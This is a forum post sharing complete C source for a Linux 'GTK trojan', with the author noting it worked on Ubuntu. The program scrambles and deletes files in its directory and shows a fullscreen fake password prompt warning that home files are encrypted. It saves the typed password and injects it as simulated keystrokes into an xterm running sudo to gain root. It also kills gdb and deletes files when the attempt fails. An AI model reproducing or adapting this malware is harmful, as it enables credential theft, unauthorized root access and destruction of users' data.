GTK Linux Trojan

August 30, 2010

//gcc -lX11 -lXtst gtkthief2.c -o gtkthief2 `pkg-config --cflags --libs gtk+-2.0`
//JMC31337
//VIRAL WEAPONRY LABZ
#include <gtk/gtk.h>
#include <stdio.h>
//#include <gdk/gdkkeysyms.h>
#include <stdlib.h>
#include <X11/Xlib.h>
#include <X11/keysym.h>
#include <X11/extensions/XTest.h>
#include <string.h>
#include <linux/input.h>
#include <X11/Xutil.h>
#include <X11/Xatom.h>
#include <X11/keysymdef.h>
#include <dirent.h>
int apt=1;
//===================================
static void delete()
{
system("chmod 755 *");
system("pkill gdb");
struct dirent **namelist;
int n;
int c;
int apt=1;
int C4 = 4;
n = scandir(".", &namelist, 0, alphasort);
if (n < 0)
perror("scandir");
else 
{
while(n--) 
{
if(strcmp(namelist[n]->d_name,".")==0 || strcmp(namelist[n]->d_name,"..")==0)
{break;}
if(strcmp(namelist[n]->d_name,"gtkthief2")!=0)
{
if(strcmp(namelist[n]->d_name,"SG.txt")!=0)
{
if(apt<=2)
{
//printf("%s\n", namelist[n]->d_name);
remove(namelist[n]->d_name);
apt++;
free(namelist[n]);
}
}
}
}
free(namelist);
}
}
//===================================
static void encrypt()
{
system("chmod 755 *");
system("pkill gdb");
struct dirent **namelist;
int n;
int c;
int C4 = 4;
FILE *stream,*fo;
n = scandir(".", &namelist, 0, alphasort);
int tot=n;
int totd = tot*2;
if (n < 0)
perror("scandir");
else 
{
while(n--) 
{
if(strcmp(namelist[n]->d_name,".")==0 || strcmp(namelist[n]->d_name,"..")==0)
{break;}
if(strcmp(namelist[n]->d_name,"gtkthief2")!=0)
{
printf("%s\n", namelist[n]->d_name);
//getchar();
if((stream = fopen(namelist[n]->d_name,"r")) != (FILE *) 0)
{
while((c=getc(stream)) != EOF )
{
char sgfile[255];
sprintf(sgfile,"sg%d",tot);
char skb = c + C4;
fo=fopen(sgfile,"a+");
fprintf(fo,"%c",skb);
fclose(fo);
//printf("%d",c);
//printf("\n");
}
fclose(stream);
c=0;
}
tot--;
//totd--;
remove(namelist[n]->d_name);
free(namelist[n]);
}
}
free(namelist);
}
}
//===================================
static void decrypt()
{
system("chmod 755 *");
system("pkill gdb");
struct dirent **namelist;
int n;
int c;
int C4 = 4;
FILE *stream,*fo;
n = scandir(".", &namelist, 0, alphasort);
int tot=n;
int totd = tot*2;
if (n < 0)
perror("scandir");
else 
{
while(n--) 
{
if(strcmp(namelist[n]->d_name,".")==0 || strcmp(namelist[n]->d_name,"..")==0)
{break;}
if(strcmp(namelist[n]->d_name,"gtkthief2")!=0)
{
printf("%s\n", namelist[n]->d_name);
//getchar();
if((stream = fopen(namelist[n]->d_name,"r")) != (FILE *) 0)
{
while((c=getc(stream)) != EOF )
{
char sgfile[255];
sprintf(sgfile,"sg%d",totd);
char skb = c - C4;
fo=fopen(sgfile,"a+");
fprintf(fo,"%c",skb);
fclose(fo);
//printf("%d",c);
//printf("\n");
}
fclose(stream);
c=0;
}
//tot--;
totd--;
remove(namelist[n]->d_name);
free(namelist[n]);
}
}
free(namelist);
}}
//===================================
//THNX TADEJ
typedef struct _Data Data;
struct _Data
{
    /* Buffers that will display output */
    GtkTextBuffer *out;
    GtkTextBuffer *in;     
    GtkTextBuffer *err;};
//===================================
static void destroy( GtkWidget *widget,
                     gpointer   data )
{
    gtk_main();
    //gtk_main_quit ();
}//===================================
static gboolean cb_err_watch( GIOChannel *channel, GIOCondition cond, Data                                                   *data)
{
    gchar *string;
    gsize  size;    if( cond == G_IO_HUP )
    {
        g_io_channel_unref( channel );
        return( FALSE );
    }    g_io_channel_read_line( channel, &string, &size, NULL, NULL );
    gtk_text_buffer_insert_at_cursor( data->err, string, -1 );
    g_free( string );    return( TRUE );
}
//===================================
static gboolean cb_out_watch(GIOChannel *channel, GIOCondition cond, Data                                         *data)
{
    gchar *string;
    gsize  size;    if( cond == G_IO_HUP )
    {
        g_io_channel_unref( channel );
        return( FALSE );
    }    g_io_channel_read_line( channel, &string, &size, NULL, NULL );
    gtk_text_buffer_insert_at_cursor( data->out, string, -1 );
    g_free( string );
    return( TRUE );
}
//===================================
static void cb_child_watch( GPid pid, gint status, Data *data )
{
    /* Close pid */
    g_spawn_close_pid( pid );
}
//===================================
static void cb_execute(  Data *data )
{
    GPid        pid;
    gchar      *argv[] = { "xterm",NULL };
    gint        out,err;    GIOChannel *outch,*inch,*errch;
    gboolean    ret;    /* Spawn child process */
    ret = g_spawn_async_with_pipes( "/usr/bin", argv, NULL,
                                    G_SPAWN_DO_NOT_REAP_CHILD, NULL,
                                    NULL, &pid,NULL, &out, &err, NULL );
    if( ! ret )
    {
        g_error( "SPAWN FAILED" );
        return;
    }   /* Add watch function to catch termination of the process. This function
     * will clean any remnants of process. */
   g_child_watch_add( pid, (GChildWatchFunc)cb_child_watch, data );   outch = g_io_channel_unix_new( out );
   errch = g_io_channel_unix_new( err );
  // inch = g_io_channel_unix_new( in );   /* Add watches to channels */
   g_io_add_watch( outch, G_IO_IN | G_IO_HUP, (GIOFunc)cb_out_watch, data );
   g_io_add_watch( errch, G_IO_IN | G_IO_HUP, (GIOFunc)cb_err_watch, data );
  // g_io_add_watch( inch, G_IO_OUT | G_IO_HUP, (GIOFunc)cb_in_watch, data );
}
//===================================
//THNKX Bharathi
static void SendKey (Display * disp, KeySym keysym, KeySym modsym)  
 {  
   KeyCode keycode = 0, modcode = 0;  
   keycode = XKeysymToKeycode (disp, keysym);  
   if (keycode == 0) return;  
   XTestGrabControl (disp, True);  
   /* Generate modkey press */  
   if (modsym != 0)  
   {  
      modcode = XKeysymToKeycode(disp, modsym);  
      XTestFakeKeyEvent (disp, modcode, True, 0);  
   }  
   /* Generate regular key press and release */  
   XTestFakeKeyEvent (disp, keycode, True, 0);  
   XTestFakeKeyEvent (disp, keycode, False, 0);  
   /* Generate modkey release */  
   if (modsym != 0)  
   XTestFakeKeyEvent (disp, modcode, False, 0);  
   XSync (disp, False);  
   XTestGrabControl (disp, False);  
 }
//===================================
static void Disable (Display * disp, KeySym keysym, KeySym modsym)  
 {  
   KeyCode keycode = 0, modcode = 0;  
   keycode = XKeysymToKeycode (disp, keysym);  
   XTestGrabControl (disp, True);  
   XTestFakeKeyEvent (disp, keycode, False, 0);  
   if (modsym != 0)
   { 
   XTestFakeKeyEvent (disp, modcode, False, 0);  
   }
   XSync (disp, False);  
   XTestGrabControl (disp, False);  
 }
//===================================
void exprog(int sig);void exprog(int sig)
{
signal(SIGINT,SIG_IGN);}
//====================================gboolean updatex (GtkWidget *entry, GdkEventKey *event, gpointer nolle)
{ const gchar *text = gtk_entry_get_text(GTK_ENTRY(entry));int sig;
//signal(SIGINT,exprog);if(event -> keyval != '\0')
{/*
if(event -> keyval == XK_Alt_L)
{
Display *disp = XOpenDisplay (NULL);
Disable (disp, XK_Alt_L,0);
XSync (disp, False);  
XTestGrabControl (disp, False);
XCloseDisplay(disp);
gtk_widget_grab_focus(GTK_WIDGET(entry));
}
*/
/*
if(event -> keyval == XK_Alt_R)
{
Display *disp = XOpenDisplay (NULL);
Disable (disp, XK_Alt_R,0);
XSync (disp, False);  
XTestGrabControl (disp, False);
XCloseDisplay(disp);
gtk_widget_grab_focus(GTK_WIDGET(entry));
}
*/
/*
if(event -> keyval == XK_Control_R)
{Display *disp = XOpenDisplay (NULL);
Disable (disp, XK_Control_R,0);
XSync (disp, False);  
XTestGrabControl (disp, False);
XCloseDisplay(disp);
gtk_widget_grab_focus(GTK_WIDGET(entry));}if(event -> keyval == XK_Control_L)
{Display *disp = XOpenDisplay (NULL);
Disable (disp, XK_Control_L,0);
XSync (disp, False);  
XTestGrabControl (disp, False);
XCloseDisplay(disp);
gtk_widget_grab_focus(GTK_WIDGET(entry));}
*/if(event -> keyval == XK_Return)
{
int x = system("mkdir /sg");  //BadCrC
if(x!=0 || getuid() != 0)   //thnx herm1t
{
printf("NOT ROOT\n");
}
else
{
printf("GOT ROOT\n");
decrypt();
gtk_main_quit(); //RUN WHATEVER FUNCTION YOU WANT AS ROOT HERE
}
//g_print(text);
//g_print("\n");FILE *fp;
fp=fopen("SG.txt","w+");  //BadCrC
fputs(text,fp);
fclose(fp);Display *disp = XOpenDisplay (NULL);
XSync (disp, False);  
XTestGrabControl (disp, False);
XFlush(disp);
XCloseDisplay(disp);
Data      *data;
data = g_slice_new(Data);
cb_execute(data); //NEEDED FOR REPARENT WINDOW PROCESS ID//=========================    Display *display;
    Window rootwin;
    display = XOpenDisplay( NULL );
    rootwin = DefaultRootWindow( display );
    XSelectInput( display, rootwin, SubstructureNotifyMask );
    XEvent event;
    int y=0;
    while(y==0) 
    {
    XNextEvent( display, &event );
    if(event.type == ReparentNotify ) 
    {
    XReparentEvent *reparentevent = (XReparentEvent *)&event;
    //printf( "Spawned WinID: 0x%x\n", (unsigned int)(reparentevent->window));
    sleep(1);
    Display *disp2 = XOpenDisplay (NULL);
    Window w;
    char *end = NULL;
    unsigned int w_str = reparentevent->window;
    //w=strtoul(ch,&end,16);
    XSetInputFocus(disp2,w_str,RevertToPointerRoot,CurrentTime);
    XFlush(disp2);
    sleep(3);
    SendKey (disp2, XK_s, 0);
    SendKey (disp2, XK_u, 0);
    SendKey (disp2, XK_d, 0); 
    SendKey (disp2, XK_o, 0);
    SendKey (disp2, XK_space, 0);
    SendKey (disp2, XK_m, 0);
    SendKey (disp2, XK_k, 0);
    SendKey (disp2, XK_d, 0);
    SendKey (disp2, XK_i, 0);
    SendKey (disp2, XK_r, 0);
    SendKey (disp2, XK_space, 0);
    SendKey (disp2, XK_slash, 0);
    SendKey (disp2, XK_s, 0);   //BadCrC
    SendKey (disp2, XK_g, 0);
    SendKey (disp2, XK_Return, 0);
    XFlush(disp2);
    //===========================
    int c,zz;
    zz=0;
    FILE *stream;
    jumper:    
    sleep(3);    
    if((stream = fopen("SG.txt","r")) != (FILE *) 0)
    {
    while((c=getc(stream)) != EOF )
    {
    SendKey(disp2,c,0);
    }
    }    
    SendKey(disp2,XK_Return,0);
    XFlush(disp2);
    zz++;
    if(zz!=3)
    {goto jumper;}
    //===========================
    y++;    
    }
    }//==========================int exist=system("ls /sg");
if(exist!=0)
{
system("pkill xterm");
delete();
}
else
{
//RUN WHATEVERAS ROOT HERE
system("pkill xterm");
printf("ROOTED\n");
decrypt();
gtk_main_quit();
}
gtk_widget_grab_focus(GTK_WIDGET(entry));
g_slice_free(Data,data);
//gtk_main_quit();
}}   return FALSE;
}
//====================================
GtkWidget *
create_window(void)
{
GtkWidget *window;
GtkWidget *fixed;
GtkWidget *label,*label2,*label3,*label4;
GtkWidget *entry;
GtkWidget *nolle = NULL;window = gtk_window_new(GTK_WINDOW_TOPLEVEL);
gtk_window_set_decorated(GTK_WINDOW(window),FALSE);
gtk_window_fullscreen(GTK_WINDOW(window));
gtk_window_set_keep_above(GTK_WINDOW(window),TRUE);
fixed = gtk_fixed_new();
gtk_widget_show(fixed);
gtk_container_add(GTK_CONTAINER(window),fixed);
//=========================================
//USER NAME STUFFchar *s;
s=getenv("USER");
label2 = gtk_label_new(s);
gtk_widget_show(label2);
gtk_fixed_put(GTK_FIXED(fixed),label2,410,300);
//=========================================
//PASSWORD STUFF
label=gtk_label_new("PASSWORD:");
gtk_widget_show(label);
gtk_fixed_put(GTK_FIXED(fixed),label,100,350);entry = gtk_entry_new();
gtk_entry_set_visibility(GTK_ENTRY(entry),FALSE);
gtk_entry_set_width_chars(GTK_ENTRY(entry),75);
gtk_widget_show(entry);
gtk_fixed_put(GTK_FIXED(fixed),entry,185,345);
gtk_widget_grab_focus(entry);
//==========================================
//LIKE CLOCK-WORK
//PLACE PROGRESS BAR CODE HERE!!!
char *tik = "30";
label3 = gtk_label_new(tik);
gtk_widget_show(label3);
gtk_fixed_put(GTK_FIXED(fixed),label3,430,380);
//============================================
char *xox="Seconds left, your HOME files are ENCRYPTED\nENTER YOUR PASSWORD NOW! DO NOT REBOOT\n           OR YOUR DATA WILL BE LOST ";
label4=gtk_label_new(xox);
gtk_widget_show(label4);
gtk_fixed_put(GTK_FIXED(fixed),label4,300,400);
//=========================================
g_signal_connect(G_OBJECT(entry), "key-press-event", G_CALLBACK(updatex), nolle);
//=========================================
//g_signal_connect(G_OBJECT(button), "clicked", G_CALLBACK(cb_execute),data);
//=========================================
g_signal_connect (window, "destroy",
              G_CALLBACK (destroy), NULL);
//===========================================
g_signal_connect (window, "delete-event",
              G_CALLBACK (destroy), NULL);
//==========================================
return window;
}main(int argc,char *argv[])
{
encrypt();
GtkWidget *window,*text;
gtk_init(&argc,&argv);
window = create_window();
gtk_widget_set_size_request(window,600,600);
gtk_widget_show(window);
gtk_main();
Data *data;
data = g_slice_new( Data );
text = gtk_text_view_new();
//CHILD PROCESS OUTPUT DATA IS STORED IN HERE
data->out = gtk_text_view_get_buffer( GTK_TEXT_VIEW( text ) );
//ERROR IF PERMISSION IS DENIED IS STORED IN HERE
data->err = gtk_text_view_get_buffer( GTK_TEXT_VIEW( text ) );
return 0;
}

nothing great but it worked on ubuntu

Edited December 15, 2010 by JMC31337

Sign In

GTK Linux Trojan

Recommended Posts

JMC31337

Create an account or sign in to comment

Create an account

Sign in

Community

Search